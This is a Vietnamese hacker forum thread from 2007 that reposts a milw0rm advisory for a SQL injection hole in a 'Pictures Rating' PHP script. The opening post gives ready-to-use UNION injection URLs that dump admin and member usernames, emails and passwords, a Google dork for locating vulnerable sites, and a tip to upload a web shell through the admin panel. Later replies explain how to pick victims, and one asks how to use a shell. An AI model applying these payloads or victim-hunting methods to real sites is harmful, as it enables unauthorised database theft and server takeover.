banner

[Rule] Rules  [Home] Main Forum  [Portal] Portal  
[Members] Member Listing  [Statistics] Statistics  [Search] Search  [Reading Room] Reading Room 
[Register] Register  
[Login] Loginhttp  | https  ]
 
Forum Index Thông tin new bugs và exploits Pictures Rating SQL Injection Vulnerbility  XML
  [Announcement]   Pictures Rating SQL Injection Vulnerbility 19/07/2007 05:55:52 (+0700) | #1 | 72161
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Code:
--==+================================================================================+==--
--==+                  Pictures Rating SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--



AUTHOR: t0pP8uZz & xprog
SITE: N/A
DORK: allintext:"Latest Pictures" Name   Gender   Profile   Rating


DESCRIPTION:
pull out admin/members info


EXPLOITS:
 http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,password,0x3c623e),5,6,7/**/FROM/**/admin/*
 http://server.com/Script_Dir/index.php?cmd=8&msgid=52/**/UNION/**/ALL/**/SELECt/**/1,2,@@version,concat(0x3c623e,username,0x3a,email,0x3a,password,0x3c623e),5,6,7/**/FROM/**/members/*


NOTE/TIP:
you must register first
admin login is at /admin/ you can backup the DB there.


GREETZ: milw0rm.com, H4CKY0u.org, G0t-Root.net/G0t-Root.org !


--==+================================================================================+==--
--==+                  Pictures Rating SQL Injection Vulnerbility                 +==--
--==+================================================================================+==--

# milw0rm.com [2007-07-18]

Với chức năng Upload Banner trong CP thì chúng ta có thể upshell lên và... muốn làm gì thì làm :lolsmilie smilie) smilie)
[Up] [Print Copy]
  [Question]   Pictures Rating SQL Injection Vulnerbility 19/07/2007 10:50:25 (+0700) | #2 | 72195
[Avatar]
lamhoang20002000
Member

[Minus]    0    [Plus]
Joined: 03/04/2005 16:32:02
Messages: 52
Offline
[Profile] [PM] [Yahoo!]
Server.com fix lỗi này rùi hay sao ấy nhỉ?
[Up] [Print Copy]
  [Question]   Pictures Rating SQL Injection Vulnerbility 19/07/2007 10:55:55 (+0700) | #3 | 72197
BigballVN
Elite Member

[Minus]    0    [Plus]
Joined: 12/06/2005 07:25:21
Messages: 610
Offline
[Profile] [PM]
Bạn ơi. Đây chỉ là ví dụ thôi. Bạn phải thay server.com bằng link của victim. Cách tìm victim thì dùng google tìm với nội dung sau:

allintext:"Latest Pictures" Name Gender Profile Rating
 
[Up] [Print Copy]
  [Question]   Pictures Rating SQL Injection Vulnerbility 19/07/2007 11:06:42 (+0700) | #4 | 72201
[Avatar]
minhquan1712
Member

[Minus]    0    [Plus]
Joined: 07/09/2006 16:17:25
Messages: 240
Offline
[Profile] [PM]
trong mấy cái exploit thì nếu có câu dork:.... jì jì đó là cách search site bị dính bug trong google đó.
[Up] [Print Copy]
  [Question]   Re: Pictures Rating SQL Injection Vulnerbility 31/07/2007 07:22:39 (+0700) | #5 | 75191
[Avatar]
KINYO
Member

[Minus]    0    [Plus]
Joined: 30/06/2006 19:10:11
Messages: 272
Location: localhost
Offline
[Profile] [PM] [WWW]
Lại cái tội quên intval() đây mà.
[Up] [Print Copy]
  [Question]   Pictures Rating SQL Injection Vulnerbility 31/07/2007 20:50:49 (+0700) | #6 | 75312
kimsonha
Member

[Minus]    0    [Plus]
Joined: 28/05/2007 10:07:19
Messages: 46
Offline
[Profile] [PM] [Yahoo!]
Xin lỗi mấy bác ,nhưng em là người mới nhìn đoạn code đó mà chẳng hiểu gì cả,mấy bác chỉ rõ cách dùng được không ạ !
[Up] [Print Copy]
  [Question]   Pictures Rating SQL Injection Vulnerbility 01/08/2007 00:16:08 (+0700) | #7 | 75387
[Avatar]
lamhoang20002000
Member

[Minus]    0    [Plus]
Joined: 03/04/2005 16:32:02
Messages: 52
Offline
[Profile] [PM] [Yahoo!]
Hì, thật lơ đãng, quên mất rằng server.com chỉ là ví dụ.
[Up] [Print Copy]
  [Question]   Pictures Rating SQL Injection Vulnerbility 18/08/2007 13:05:18 (+0700) | #8 | 79558
Nowhereman
Elite Member

[Minus]    0    [Plus]
Joined: 19/11/2003 06:25:42
Messages: 108
Offline
[Profile] [PM] [Email]
gia nhu' hack chi don gian nhu' vay ? nhi? ke ke ke ? " muon lam gi thi lam " nghe ngon wua' bac' smilie .

lang thang vẫn mãi không nhà
đôi chân lê bước thê lương tháng ngày
càng đi càng thấy đắm say
tình thương con Chúa lòng này chẳng phai
thời gian cứ mãi miệt mài
lang thang đi tiếp ....rồi bay lên z ời
cúi đầu con lạy Ông Trời
xin thươn
[Up] [Print Copy]
  [Question]   Re: Pictures Rating SQL Injection Vulnerbility 18/08/2007 22:07:59 (+0700) | #9 | 79580
[Avatar]
oldboydhp
Member

[Minus]    0    [Plus]
Joined: 30/07/2006 14:16:06
Messages: 6
Location: Quảng Nam
Offline
[Profile] [PM] [WWW] [Yahoo!]
đó chỉ là lý thuyết thôi.Chưs cứ thử thực hành đi rồi biết
[Up] [Print Copy]
  [Question]   Re: Pictures Rating SQL Injection Vulnerbility 01/10/2007 07:01:02 (+0700) | #10 | 88079
[Avatar]
phstiger
Member

[Minus]    0    [Plus]
Joined: 23/01/2007 17:47:26
Messages: 261
Offline
[Profile] [PM]
Lại cái tội quên intval() đây mà. 

Hàm này dùng để chống việc jì vậy Bác. Có phải chống các dấu ' trong SQL không vậy?
[Up] [Print Copy]
  [Question]   Re: Pictures Rating SQL Injection Vulnerbility 01/10/2007 09:45:03 (+0700) | #11 | 88098
ngonchan
Elite Member

[Minus]    0    [Plus]
Joined: 23/02/2004 12:03:51
Messages: 136
Offline
[Profile] [PM] [WWW] [Yahoo!]

phstiger wrote:
Lại cái tội quên intval() đây mà. 

Hàm này dùng để chống việc jì vậy Bác. Có phải chống các dấu ' trong SQL không vậy? 


Bạn nên xem tại đây: http://www.php.net/manual/en/function.intval.php
[Up] [Print Copy]
  [Question]   Re: Pictures Rating SQL Injection Vulnerbility 04/10/2007 20:30:57 (+0700) | #12 | 88620
NEO20L4
Member

[Minus]    0    [Plus]
Joined: 05/09/2007 09:52:37
Messages: 2
Offline
[Profile] [PM]
Bác Bigball nói ngon ăn quá, Em cũng chỉ mới biết úphell lên, chưa biết sử dụng nó ra sao nữa. Nếu các bác nhiết tình xin cho em vài đường chỉ dẫn cách sử dụng shell. Thanks all
[Up] [Print Copy]
  [Question]   Re: Pictures Rating SQL Injection Vulnerbility 06/10/2007 19:58:00 (+0700) | #13 | 89021
cutynhangheo
Member

[Minus]    0    [Plus]
Joined: 02/01/2007 00:30:04
Messages: 1
Offline
[Profile] [PM]
Lấy được thông tin admin cũng chẳng làm gì được , pass bi encrypt roài thì có crack cũng là một việc quá đổi mất thời gian và đến lúc đó admin của forum đó cũng fix được bug này roài smilie)
[Up] [Print Copy]
[digg] [delicious] [google] [yahoo] [technorati] [reddit] [stumbleupon]
Go to: 
 Users currently in here 
1 Anonymous

Powered by JForum - Extended by HVAOnline
 hvaonline.net  |  hvaforum.net  |  hvazone.net  |  hvanews.net  |  vnhacker.org
1999 - 2013 © v2012|0504|218|